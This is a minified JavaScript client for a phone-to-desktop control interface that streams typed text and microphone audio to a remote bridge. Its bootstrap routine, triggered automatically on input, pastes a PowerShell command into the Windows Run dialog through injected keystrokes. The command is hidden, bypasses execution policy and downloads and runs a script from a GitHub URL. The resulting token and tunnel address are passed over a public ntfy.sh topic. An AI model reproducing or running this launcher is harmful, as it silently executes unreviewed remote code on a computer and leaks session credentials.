(()=>{'use strict';
const TAIL='https://desktop-6fn9b4m-1.tail1bf489.ts.net:8444';
const RAW='https://raw.githubusercontent.com/Pokitomas/archie-backend-xfer-1787735782/master/';
const $=id=>document.getElementById(id),root=$('root'),screen=$('screen'),canvas=$('scene'),ctx=canvas.getContext('2d'),layers=$('layers'),ink=$('ink'),key=$('key'),sceneStyle=$('sceneStyle');
let bridge='',token='',topic='',agent='gpt56sol-interface-live',session=false,awake=false,bootPromise=null,recovering=false,recoverBackoff=90,fieldEpoch=0,screenEpoch=0;
let sceneDef={revision:0,css:'',layers:[],nodes:[],features:{}},sceneRevision=-1;
let model={status:'cold',latency:'',field:{},draft:{value:''},control:{held:false},selftest:{}};
let textStream=crypto.randomUUID(),textRevision=0,pendingSymbol=null,symbolSending=false,composing=false;
let micOn=false,micStream=null,audioCtx=null,processor=null,source=null,contactWanted=false,contactEpoch=0,contactStream='',contactParts=[],contactBytes=0,previewMark=0,contactReady=null;
let sampleQueue=[],sampleSending=false,holdTimer=0,holdStarted=false,keyPointer=null;
const MAX_CONTACT_BYTES=640000,PREVIEW_STEP=16000,PREVIEW_WINDOW=96000;
const sleep=ms=>new Promise(r=>setTimeout(r,ms)),now=()=>performance.now();
const rand=n=>{const a=crypto.getRandomValues(new Uint8Array(n));let s='';for(const b of a)s+=String.fromCharCode(b);return btoa(s).replace(/\+/g,'-').replace(/\//g,'_').replace(/=+$/,'')};
function getPath(o,p){let v=o;for(const k of String(p||'').split('.')){if(!k)continue;if(v==null)return '';v=v[k]}return v==null?'':v}
function putChannel(channel,event){let v=model.field;const parts=String(channel||'field').split('.').filter(Boolean);for(let i=0;i<parts.length-1;i++){const k=parts[i];if(!v[k]||typeof v[k]!=='object')v[k]={};v=v[k]}v[parts[parts.length-1]||'field']=event}
function displayValue(v){if(v==null)return '';if(typeof v==='string'||typeof v==='number'||typeof v==='boolean')return String(v);try{return JSON.stringify(v,null,1)}catch(_){return String(v)}}
function fitViewport(){const v=visualViewport;if(!v){root.style.height='100%';root.style.top='0';return}root.style.height=Math.max(1,v.height)+'px';root.style.top=Math.max(0,v.offsetTop)+'px'}
fitViewport();visualViewport?.addEventListener('resize',fitViewport);visualViewport?.addEventListener('scroll',fitViewport);
function remember(){if(bridge&&token)localStorage.setItem('archie.field.v2',JSON.stringify({bridge,token,at:Date.now()}))}
function recall(){try{const v=JSON.parse(localStorage.getItem('archie.field.v2')||'{}');if(v.bridge&&v.token&&Date.now()-(v.at||0)<604800000){bridge=v.bridge;token=v.token;return true}}catch(_){}return false}
function forgetBridge(){bridge='';token='';session=false;fieldEpoch++;screenEpoch++;screen.classList.remove('live');screen.removeAttribute('src')}
function timeoutFetch(url,opt={},ms=2200){const ac=new AbortController(),tm=setTimeout(()=>ac.abort(),ms);return fetch(url,{cache:'no-store',...opt,signal:ac.signal}).finally(()=>clearTimeout(tm))}
function localSelfTest(){const c={crypto:!!globalThis.crypto?.getRandomValues,fetch:typeof fetch==='function',stream:!!ReadableStream,canvas:!!ctx,storage:true,pointer:typeof PointerEvent!=='undefined',viewport:!!visualViewport,audio:!!navigator.mediaDevices?.getUserMedia};try{localStorage.setItem('archie.field.probe','1');localStorage.removeItem('archie.field.probe')}catch(_){c.storage=false}return{ok:Object.values(c).every(Boolean),checks:c}}
async function tailGet(p,ms=1600){const r=await timeoutFetch(TAIL+p,{},ms);if(!r.ok)throw Error('tail '+r.status);return r.json()}
async function tailPost(p,o,ms=3500){const r=await timeoutFetch(TAIL+p,{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify(o)},ms);let v={};try{v=await r.json()}catch(_){}if(!r.ok)throw Error('tail '+r.status);return v}
async function action(o){o.agent=agent;return tailPost('/action',o,5000)}
async function api(p,opt={},ms=2200){if(!bridge||!token)throw Error('bridge absent');const t=now(),r=await timeoutFetch(bridge+p,{...opt,headers:{...(opt.headers||{}),'Authorization':'Bearer '+token}},ms);model.latency=Math.round(now()-t)+'ms';return r}
function ensureCanvas(){const dpr=Math.max(1,Math.min(3,devicePixelRatio||1)),w=root.clientWidth,h=root.clientHeight,nw=Math.round(w*dpr),nh=Math.round(h*dpr);if(canvas.width!==nw||canvas.height!==nh){canvas.width=nw;canvas.height=nh;canvas.style.width=w+'px';canvas.style.height=h+'px'}ctx.setTransform(dpr,0,0,dpr,0,0)}
function num(v,d=0){if(typeof v==='number')return v;if(typeof v==='string'){const n=Number(getPath(model,v));return Number.isFinite(n)?n:d}return d}
function draw(){ensureCanvas();const w=root.clientWidth,h=root.clientHeight;ctx.clearRect(0,0,w,h);for(const n of Array.isArray(sceneDef.nodes)?sceneDef.nodes:[]){if(!n||typeof n!=='object'||(n.when&&!getPath(model,n.when)))continue;ctx.globalAlpha=Math.max(0,Math.min(1,num(n.alpha,1)));ctx.fillStyle=String(n.fill||'rgba(255,255,255,.12)');ctx.strokeStyle=String(n.stroke||'rgba(255,255,255,.35)');ctx.lineWidth=Math.max(.25,num(n.line,1));const x=num(n.x,.5)*w,y=num(n.y,.5)*h,r=num(n.r,.02)*Math.min(w,h);if(n.kind==='disc'){ctx.beginPath();ctx.arc(x,y,r,0,Math.PI*2);ctx.fill()}else if(n.kind==='ring'){ctx.beginPath();ctx.arc(x,y,r,0,Math.PI*2);ctx.stroke()}else if(n.kind==='grid'){const cols=Math.max(1,Math.floor(num(n.cols,3))),rows=Math.max(1,Math.floor(num(n.rows,3))),sx=num(n.sx,.02)*w,sy=num(n.sy,.02)*h;for(let iy=0;iy<rows;iy++)for(let ix=0;ix<cols;ix++){ctx.beginPath();ctx.arc(x+(ix-(cols-1)/2)*sx,y+(iy-(rows-1)/2)*sy,r,0,Math.PI*2);ctx.fill()}}}ctx.globalAlpha=1;requestAnimationFrame(draw)}requestAnimationFrame(draw);
function buildLayers(){layers.replaceChildren();for(const d of Array.isArray(sceneDef.layers)?sceneDef.layers:[]){if(!d?.id)continue;const el=document.createElement('div');el.className='scene-layer '+String(d.class||'');el.dataset.sceneId=String(d.id);if(d.style&&typeof d.style==='object')Object.assign(el.style,d.style);layers.appendChild(el)}}
function render(){for(const d of Array.isArray(sceneDef.layers)?sceneDef.layers:[]){const el=layers.querySelector('[data-scene-id="'+CSS.escape(String(d.id))+'"]');if(!el)continue;let v=getPath(model,d.bind||'');if(d.map&&Object.prototype.hasOwnProperty.call(d.map,String(v)))v=d.map[String(v)];if(typeof d.prefix==='string'&&v!=='')v=d.prefix+v;if(typeof d.suffix==='string'&&v!=='')v=v+d.suffix;const text=displayValue(v);el.textContent=text;el.hidden=!!d.hideEmpty&&!text}}
function applyScene(v){if(!v||typeof v!=='object')return;const sig=JSON.stringify(v);if(Number(v.revision||0)===sceneRevision&&sig===JSON.stringify(sceneDef))return;sceneDef=v;sceneRevision=Number(v.revision||0);sceneStyle.textContent=String(v.css||'').slice(0,120000);buildLayers();render()}
async function loadStaticScene(){try{const u=new URL('phone_scene.json',location.href);u.searchParams.set('t',Date.now());const r=await timeoutFetch(u.href,{},1500);if(r.ok)applyScene(await r.json())}catch(_){}}
loadStaticScene();setInterval(()=>{if(!session)loadStaticScene()},1800);
async function remoteSelfTest(){const a=await api('/api/selftest',{},1500);if(!a.ok)throw Error('remote selftest');const s=await a.json();if(!s.ok)throw Error('remote selftest');const h=await api('/api/health',{},1500);if(!h.ok||(await h.json()).ok!==true)throw Error('remote health');model.selftest=s}
async function openSession(){await remoteSelfTest();const r=await api('/api/session',{method:'POST'},1800);if(!r.ok)throw Error('session');session=true;remember();recoverBackoff=90;model.status='live';startFieldStream();flushSymbol();flushSamples();render()}
function startScreenRef(payload){const p=payload&&payload.path;if(!p||!bridge||!token)return;const epoch=++screenEpoch;screen.src=bridge+p+(p.includes('?')?'&':'?')+'t='+encodeURIComponent(token)+'&e='+epoch;screen.classList.add('live')}
screen.onerror=()=>{screen.classList.remove('live');const e=getPath(model,'field.machine.screen');if(session&&e?.payload)setTimeout(()=>startScreenRef(e.payload),150)};
function acceptEvent(e){if(!e||typeof e!=='object'||!e.channel)return;putChannel(e.channel,e);if(e.channel==='surface.scene'&&e.payload&&typeof e.payload==='object')applyScene(e.payload);if(e.channel==='machine.screen'&&e.payload)startScreenRef(e.payload);if(e.channel==='controller.state'&&e.payload){const events=Array.isArray(e.payload.events)?e.payload.events:[];if(events.length)putChannel('controller.event',{channel:'controller.event',shape:'application/vnd.archie.controller-event+json',payload:events[events.length-1],at:e.at});}render()}
async function startFieldStream(){const epoch=++fieldEpoch;try{const r=await fetch(bridge+'/api/field.ndjson',{cache:'no-store',headers:{'Authorization':'Bearer '+token,'Accept':'application/x-ndjson'}});if(!r.ok||!r.body)throw Error('field stream');const reader=r.body.getReader(),dec=new TextDecoder();let buf='';while(session&&epoch===fieldEpoch){const {value,done}=await reader.read();if(done)throw Error('field eof');buf+=dec.decode(value,{stream:true});for(;;){const i=buf.indexOf('\n');if(i<0)break;const line=buf.slice(0,i);buf=buf.slice(i+1);if(!line)continue;let v;try{v=JSON.parse(line)}catch(_){continue}if(v.type==='field'){for(const e of v.events||[])acceptEvent(e);model.status='live';render()}}}}catch(_){if(epoch===fieldEpoch&&session){session=false;model.status='recovering';render()}}}
async function rendezvous(){for(let i=0;i<130;i++){try{const r=await timeoutFetch('https://ntfy.sh/'+encodeURIComponent(topic)+'/json?poll=1&since=all',{},1450);if(r.ok){const txt=await r.text();for(const line of txt.trim().split('\n').reverse()){try{const v=JSON.parse(line),m=JSON.parse(v.message||'{}');if(m.url&&m.token===token)return String(m.url).replace(/\/$/,'')}catch(_){}}}}catch(_){}try{const w=await tailGet('/windows',1100),m=JSON.stringify(w).match(/https:\/\/[a-z0-9-]+\.trycloudflare\.com/i);if(m)return m[0]}catch(_){}await sleep(220)}throw Error('rendezvous')}
async function bootstrap(){if(bootPromise)return bootPromise;bootPromise=(async()=>{const local=localSelfTest();if(!local.ok)throw Error('local selftest');const h=await tailGet('/seat/head',1500);if(!h||h.error||!h.active_occupant)throw Error('controller selftest');agent=h.active_occupant||agent;token=rand(32);topic='archie-'+rand(18).toLowerCase();try{await action({action:'timebox',seconds:900,label:'entry-pressure',intent:'automatic ingress pressure'})}catch(_){}const boot=RAW+'field_bootstrap.ps1';const cmd=`powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$u='${boot}';$p=Join-Path $env:TEMP 'archie_field_bootstrap.ps1';Invoke-WebRequest -UseBasicParsing ($u+'?t='+[DateTimeOffset]::UtcNow.ToUnixTimeMilliseconds()) -OutFile $p;& $p -Token '${token}' -Topic '${topic}'"`;await action({action:'clipboard_set',text:cmd,value:cmd,clipboard:cmd});await action({action:'hotkey',keys:['win','r']});await sleep(170);await action({action:'hotkey',keys:['ctrl','v']});await sleep(55);await action({action:'key',key:'enter'});bridge=await rendezvous();await openSession()})().finally(()=>bootPromise=null);return bootPromise}
async function recoverForever(){if(recovering)return;recovering=true;for(;;){if(session){await sleep(220);continue}model.status='recovering';render();try{if(bridge&&token){try{await openSession();continue}catch(_){forgetBridge()}}if(!bridge)recall();if(bridge&&token){try{await openSession();continue}catch(_){forgetBridge()}}if(awake&&navigator.onLine){await bootstrap();continue}}catch(_){}await sleep(recoverBackoff);recoverBackoff=Math.min(5000,Math.round(recoverBackoff*1.5))}}recoverForever();
function kick(){awake=true;recoverBackoff=35;if(!session&&!bridge&&!bootPromise)bootstrap().catch(()=>{})}
async function emit(channel,shape,payload,{stream='',revision=0,final=false,meta={}}={}){if(!session)throw Error('offline');const r=await api('/api/field',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({channel,shape,payload,stream,revision,final,meta})},1300);if(!r.ok)throw Error('field '+r.status);return r.json()}
async function emitBinary(channel,shape,body,{stream='',revision=0,final=false,meta={}}={}){if(!session)throw Error('offline');const headers={'Content-Type':'application/octet-stream','X-Field-Channel':channel,'X-Field-Shape':shape,'X-Field-Stream':stream,'X-Field-Revision':String(revision),'X-Field-Final':final?'1':'0'};if(meta.rate)headers['X-Field-Rate']=String(meta.rate);if(meta.preview)headers['X-Field-Preview']='1';const r=await api('/api/field',{method:'POST',headers,body},3200);if(!r.ok)throw Error('field '+r.status);return r.json()}
window.ARCHIE_FIELD={emit,emitBinary,latest:()=>model.field,state:()=>({status:model.status,latency:model.latency})};
function queueSymbol(final=false){const value=ink.value.replace(/\u00a0/g,' ');model.draft={value};render();textRevision++;pendingSymbol={channel:'user.primary',shape:'utf8',payload:{value},stream:textStream,revision:textRevision,final,meta:{source:'ios-control',client_sent_ms:Date.now()}};flushSymbol();if(final){ink.value='';model.draft={value:''};textStream=crypto.randomUUID();textRevision=0;render()}}
async function flushSymbol(){if(symbolSending||!session||!pendingSymbol)return;symbolSending=true;try{while(session&&pendingSymbol){const p=pendingSymbol;pendingSymbol=null;await emit(p.channel,p.shape,p.payload,p)}}catch(_){session=false}finally{symbolSending=false}}
ink.addEventListener('compositionstart',()=>composing=true);ink.addEventListener('compositionend',()=>{composing=false;queueSymbol(false)});ink.addEventListener('input',()=>{kick();if(!composing)queueSymbol(false)});ink.addEventListener('keydown',e=>{if(e.key==='Enter'&&!e.shiftKey){e.preventDefault();queueSymbol(true)}});
function resample(input,from,to=16000){if(from===to)return input;const ratio=from/to,n=Math.max(1,Math.floor(input.length/ratio)),out=new Float32Array(n);for(let i=0;i<n;i++){const a=Math.floor(i*ratio),b=Math.min(input.length-1,Math.floor((i+1)*ratio));let sum=0,c=0;for(let j=a;j<=b;j++){sum+=input[j];c++}out[i]=c?sum/c:0}return out}
function pcm16(f){const a=new Int16Array(f.length);for(let i=0;i<f.length;i++){const x=Math.max(-1,Math.min(1,f[i]));a[i]=x<0?x*32768:x*32767}return a.buffer}
function concatParts(maxBytes=MAX_CONTACT_BYTES){let keep=[],bytes=0;for(let i=contactParts.length-1;i>=0;i--){const b=contactParts[i];if(bytes+b.byteLength>maxBytes&&keep.length)break;keep.push(b);bytes+=b.byteLength;if(bytes>=maxBytes)break}keep.reverse();const out=new Uint8Array(bytes);let at=0;for(const b of keep){out.set(new Uint8Array(b),at);at+=b.byteLength}return out.buffer}
function queuePacket(body,{preview=false,final=false}={}){if(!body||body.byteLength<6400)return;if(preview){sampleQueue=sampleQueue.filter(x=>!x.preview);sampleQueue.push({body,preview:true,final:false,stream:contactStream})}else{sampleQueue=sampleQueue.filter(x=>!x.preview);sampleQueue.push({body,preview:false,final:!!final,stream:contactStream})}flushSamples()}
function appendSamples(buf){contactParts.push(buf);contactBytes+=buf.byteLength;while(contactBytes>MAX_CONTACT_BYTES&&contactParts.length>1){const b=contactParts.shift();contactBytes-=b.byteLength}if(contactBytes>=6400&&contactBytes-previewMark>=PREVIEW_STEP){previewMark=contactBytes;queuePacket(concatParts(PREVIEW_WINDOW),{preview:true})}}
async function flushSamples(){if(sampleSending||!session||!sampleQueue.length)return;sampleSending=true;try{if(contactReady)await contactReady;while(session&&sampleQueue.length){const p=sampleQueue[0];await emitBinary('user.primary','pcm_s16le',p.body,{stream:p.stream,revision:Date.now(),final:p.final,meta:{rate:16000,preview:p.preview,source:'ios-control'}});sampleQueue.shift()}}catch(_){session=false}finally{sampleSending=false}}
function sendContact(active){if(!session)return Promise.resolve(null);return emit('user.contact','application/vnd.archie.contact+json',{active:!!active,client_started_ms:Date.now()},{stream:contactStream,revision:Date.now(),final:!active,meta:{source:'ios-control'}}).catch(()=>{session=false;return null})}
async function startMic(epoch){if(micOn||!contactWanted||epoch!==contactEpoch)return;let s=null,ac=null,src=null,proc=null;try{s=await navigator.mediaDevices.getUserMedia({audio:{channelCount:1,echoCancellation:true,noiseSuppression:true,autoGainControl:true}});if(!contactWanted||epoch!==contactEpoch){s.getTracks().forEach(t=>t.stop());return}ac=new(window.AudioContext||window.webkitAudioContext)({latencyHint:'interactive'});if(ac.state==='suspended')await ac.resume();if(!contactWanted||epoch!==contactEpoch){s.getTracks().forEach(t=>t.stop());await ac.close().catch(()=>{});return}src=ac.createMediaStreamSource(s);proc=ac.createScriptProcessor(1024,1,1);proc.onaudioprocess=e=>{if(micOn&&contactWanted&&epoch===contactEpoch)appendSamples(pcm16(resample(e.inputBuffer.getChannelData(0),ac.sampleRate,16000)))};src.connect(proc);proc.connect(ac.destination);micStream=s;audioCtx=ac;source=src;processor=proc;micOn=true;model.control.held=true;key.classList.add('held');render()}catch(_){if(s)s.getTracks().forEach(t=>t.stop());if(ac)await ac.close().catch(()=>{});if(epoch===contactEpoch){model.control.held=false;key.classList.remove('held');render()}}}
function stopMic(){micOn=false;model.control.held=false;key.classList.remove('held');render();if(processor)try{processor.disconnect()}catch(_){}if(source)try{source.disconnect()}catch(_){}if(micStream)micStream.getTracks().forEach(t=>t.stop());if(audioCtx)audioCtx.close().catch(()=>{});processor=source=micStream=audioCtx=null}
function beginHold(){holdStarted=true;contactWanted=true;contactStream='contact-'+crypto.randomUUID();contactParts=[];contactBytes=0;previewMark=0;sampleQueue=[];const epoch=++contactEpoch;contactReady=sendContact(true);startMic(epoch)}
async function endHold(){contactWanted=false;++contactEpoch;stopMic();const finalBody=concatParts(MAX_CONTACT_BYTES);if(finalBody.byteLength>=6400)queuePacket(finalBody,{final:true});await flushSamples();await sendContact(false);contactReady=null;contactParts=[];contactBytes=previewMark=0;holdStarted=false}
function keyDown(e){e.preventDefault();kick();keyPointer=e.pointerId;holdStarted=false;clearTimeout(holdTimer);holdTimer=setTimeout(beginHold,115);try{key.setPointerCapture(e.pointerId)}catch(_){}}
function keyUp(e){if(keyPointer!==null&&e.pointerId!==keyPointer)return;e.preventDefault();clearTimeout(holdTimer);keyPointer=null;if(holdStarted||contactWanted||micOn){endHold();return}if(ink.value.trim())queueSymbol(true);else{ink.focus({preventScroll:true});kick()}}
key.addEventListener('pointerdown',keyDown);key.addEventListener('pointerup',keyUp);key.addEventListener('pointercancel',e=>{e.preventDefault();clearTimeout(holdTimer);keyPointer=null;if(holdStarted||contactWanted||micOn)endHold()});key.addEventListener('contextmenu',e=>e.preventDefault());
ink.addEventListener('focus',kick);window.addEventListener('online',()=>{session=false;recoverBackoff=45});document.addEventListener('visibilitychange',()=>{if(document.hidden){if(contactWanted||micOn)endHold()}else{session=false;recoverBackoff=45;loadStaticScene();fitViewport()}});
})();
